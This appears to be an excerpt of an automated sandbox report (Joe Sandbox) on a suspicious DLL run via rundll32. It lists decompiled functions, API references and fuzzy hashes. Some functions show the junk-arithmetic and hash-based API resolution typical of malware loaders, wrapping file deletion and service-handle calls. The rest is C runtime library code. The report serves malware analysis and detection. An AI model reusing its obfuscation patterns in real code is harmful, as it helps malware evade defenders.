					while(1) {
						_t8 = RtlAllocateHeap( *0x1004e624, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E1002E493();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E1002449E(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E10010107(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x10026856
0x1002685b
0x10026869
0x10026869
0x1002686f
0x10026871
0x10026871
0x10026888
0x10026891
0x10026899
0x00000000
0x00000000
0x10026879
0x1002687b
0x1002689d
0x100268a2
0x100268a8
0x00000000
0x100268a8
0x10026884
0x10026886
0x00000000
0x00000000
0x10026886
0x00000000
0x10026888
0x10026861
0x10026867
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,10024158,00000001,00000364,FFFFFFFF,000000FF), ref: 10026891

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 89b74a9fedc6c44e7e8eb0d2ef1166fcc57b5d159e965e5deff0e72c928abcbc
Instruction ID: cee442b2a179b10d771ae8e348697f5776a900ac618982ed1d16fb6086920af7
Opcode Fuzzy Hash: 89b74a9fedc6c44e7e8eb0d2ef1166fcc57b5d159e965e5deff0e72c928abcbc
Instruction Fuzzy Hash: F1F0B43560162566DB51DE66ED05B5A3798EB497A0BA24221BC04D71C4DE30FC0082E4

Uniqueness

Uniqueness Score: -1.00%

Function 0026B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0026B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0026602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002707A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0026b6f3
0x0026b6f8
0x0026b702
0x0026b70b
0x0026b712
0x0026b719
0x0026b720
0x0026b727
0x0026b72e
0x0026b747
0x0026b759
0x0026b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0026B759

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 4dd1523c19ab64ff83871dcd57a5abbbe39d3232c1b981a46ec92c34d3210dea
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 3A018BB294030CFBEF45DF94DD06E9E7BB5EF08704F108188FA09261A0D3B25E20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0027AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0027AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002707A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0027aa3f
0x0027aa40
0x0027aa41
0x0027aa44
0x0027aa47
0x0027aa4b
0x0027aa4c
0x0027aa51
0x0027aa5b
0x0027aa64
0x0027aa68
0x0027aa6f
0x0027aa76
0x0027aa8d
0x0027aa90
0x0027aa9d
0x0027aaa8
0x0027aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0027AAA8

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 76c1544a4b2e17f3600b46830ed426b8e0d57605eb32c033d05d0f5b3cce230d
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 33F069B191020CFFDF08DF94DD4A89EBFB8EB40304F108098F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000D717, Relevance: 1.5, APIs: 1, Instructions: 33
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000D717(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()** _t19;
				signed int _t20;
				signed int _t21;

				_t19 = 0x1004e040 + _a4 * 4;
				_t10 =  *_t19;
				_t21 = _t20 | 0xffffffff;
				if(_t10 == _t21) {
					L6:
					return 0;
				}
				if(_t10 == 0) {
					_t12 = E1000D67D(__ecx, _a12, _a16); // executed
					if(_t12 == 0) {
						L5:
						 *_t19 = _t21;
						goto L6;
					}
					_t13 = GetProcAddress(_t12, _a8);
					if(_t13 == 0) {
						goto L5;
					}
					 *_t19 = _t13;
					return _t13;
				}
				return _t10;
			}

0x1000d71f
0x1000d726
0x1000d728
0x1000d72d
0x1000d75a
0x00000000
0x1000d75a
0x1000d731
0x1000d739
0x1000d742
0x1000d758
0x1000d758
0x00000000
0x1000d758
0x1000d748
0x1000d750
0x00000000
0x00000000
0x1000d754
0x00000000
0x1000d754
0x1000d75f

APIs

GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,1000D871,00000001,FlsFree,10043994,FlsFree,00000000,?,10005B57,FFFFFFFF,1000528D), ref: 1000D748

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0cd0d46ad6376f16837434476ef1c2c325eb3e89ea54d8bfda6593936f27b7ea
Instruction ID: 6ae50cf1bc1ad4758d4872c1d4d64a6e8e48722a32411315d8df479ee4492f30
Opcode Fuzzy Hash: 0cd0d46ad6376f16837434476ef1c2c325eb3e89ea54d8bfda6593936f27b7ea
Instruction Fuzzy Hash: 8DF082362086569FAF02EE69AC4094E37E8EF017E07100526FA18D6198FB71D810CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00265FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00265FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002707A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00265fb5
0x00265fb6
0x00265fb7
0x00265fbb
0x00265fbc
0x00265fc1
0x00265fcb
0x00265fd7
0x00265fde
0x00265fe5
0x00265ffc
0x00265fff
0x00266006
0x0026600d
0x0026601a
0x00266025
0x0026602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00266025

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 8702fe4290028545d28765235ed1e57b8eda292c2976730f66d1e1bcb90d30de
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: A5F04FB0C11208FFDB08DFA4ED4689EBFB8EB40300F208198E409A7260E7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Function 10024214, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10024214(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E1002449E(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x1004e624, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E1002E493();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E10010107(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x1002421a
0x10024220
0x10024252
0x10024257
0x1002425d
0x00000000
0x1002425d
0x10024224
0x10024226
0x10024226
0x1002423d
0x10024246
0x1002424e
0x00000000
0x00000000
0x1002422e
0x10024230
0x00000000
0x00000000
0x10024239
0x1002423b
0x00000000
0x00000000
0x1002423b
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,70D9FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e01005b422e904f5de0f4a74a71fcacc2905bcfe713e71daf336211572b189cc
Instruction ID: 48365c050a20ae6f6e82cadb15bda1ead02787d9cc2971144663992c1c58e65a
Opcode Fuzzy Hash: e01005b422e904f5de0f4a74a71fcacc2905bcfe713e71daf336211572b189cc
Instruction Fuzzy Hash: EFE06535640261D6E625EB67BD0174B3BF8EF823E0FD30160FE649A0D5DF64DC0495A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100303BF, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E100303BF(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E10023FB6(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E10030352(0x10045ee8, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E1002FC7D(_t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E1002FD9D();
					} else {
						E1002FD04(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E10030352(0x10045bd8, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E1002FD9D();
							} else {
								E1002FD04(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E100301C9(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x2
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // -1
							_t47 = E1002FBCB(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E1000E341();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x1004d054; // 0xda1f8931
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E10023FB6(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E10023FB6(_t97, _t114) + 0x34c);
								_t127 = E10030B18(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E1003880F(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E10030C4A(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								return E100037EA(_t62, _v32 ^ _t130, _t114);
							} else {
								if(E1002A1D1(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E1002A1D1(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E10041C3B(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E1002A1D1(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E10041C3B(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E10038569(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E1002FBCB(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

GetACP.KERNEL32(?,?,?,?,?,?,10025264,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 10030480
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,10025264,?,?,?,00000055,?,-00000050,?,?), ref: 100304AB
_wcschr.LIBVCRUNTIME ref: 1003053F
_wcschr.LIBVCRUNTIME ref: 1003054D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 1003060E

Strings

utf8, xrefs: 1003057D

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 75ced19ce70953ca1f26dd45113d273372e98ffb565c56be818b802edc0bfbfe
Instruction ID: b55e07c89fb835d358cde5702a7072b0253a21d250fe5499c22d51fbea95a080
Opcode Fuzzy Hash: 75ced19ce70953ca1f26dd45113d273372e98ffb565c56be818b802edc0bfbfe
Instruction Fuzzy Hash: 7D711675A02606AFE716DB35DC52BAB73E8EF49382F114439FA45DF181EB70EA408760

Uniqueness

Uniqueness Score: -1.00%

Function 10030B69, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10030B69(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E1000FF85(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,10030E87,00000002,00000000,?,?,?,10030E87,?,00000000), ref: 10030C02
GetLocaleInfoW.KERNEL32(?,20001004,10030E87,00000002,00000000,?,?,?,10030E87,?,00000000), ref: 10030C2B
GetACP.KERNEL32(?,?,10030E87,?,00000000), ref: 10030C40

Strings

ACP, xrefs: 10030B87
OCP, xrefs: 10030BBD

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 9307766cf3f7ef350b833b5ae7400d82360007ee80431dcbf2b3d6834d8a2fd9
Instruction ID: 7366726ca8dfa1b6abe0b51d376a4784dd352efd1aa5aec34e5175226514a72e
Opcode Fuzzy Hash: 9307766cf3f7ef350b833b5ae7400d82360007ee80431dcbf2b3d6834d8a2fd9
Instruction Fuzzy Hash: 1921A472612105AFE726CF15C960A8BB2E6EF44AE6F538164F909DF215E732DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 10030D3E, Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10030D3E(void* __ecx, void* __edx, void* __eflags, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed int _t101;
				signed short _t104;
				signed int _t105;
				void* _t106;

				_t39 =  *0x1004d054; // 0xda1f8931
				_v8 = _t39 ^ _t105;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E10023FB6(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E10023FB6(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[1]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x10045ffc; // 0x17
					E10030CDD(_t89, 0, 0x10045ee8, _t83 - 1, _t99);
					_t46 = _v24;
					_t106 = _t106 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E10030661(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E10030765(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t104 = E10030B69(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t104;
							if(_t104 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E100037EA(_t53, _v8 ^ _t105, _t97);
							}
							_t55 = IsValidCodePage(_t104 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t104;
							}
							E1002A393(_v16,  &(_v24[0x94]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E1002A393(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E10038569(_t38, _t104, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x10045ee4; // 0x41
						_t75 = E10030CDD(_t89, _t97, 0x10045bd8, _t73 - 1, _v24);
						_t106 = _t106 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E10030765(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t119 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E100306CA(_t89, _t97, _t119,  &_v20);
						goto L15;
					}
					_t115 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E100306CA(_t89, _t97, _t115,  &_v20);
					goto L9;
				}
			}

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

Part of subcall function 10023FB6: _free.LIBCMT ref: 10024018
Part of subcall function 10023FB6: _free.LIBCMT ref: 1002404E

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 10030E4A
IsValidCodePage.KERNEL32(00000000), ref: 10030E93
IsValidLocale.KERNEL32(?,00000001), ref: 10030EA2
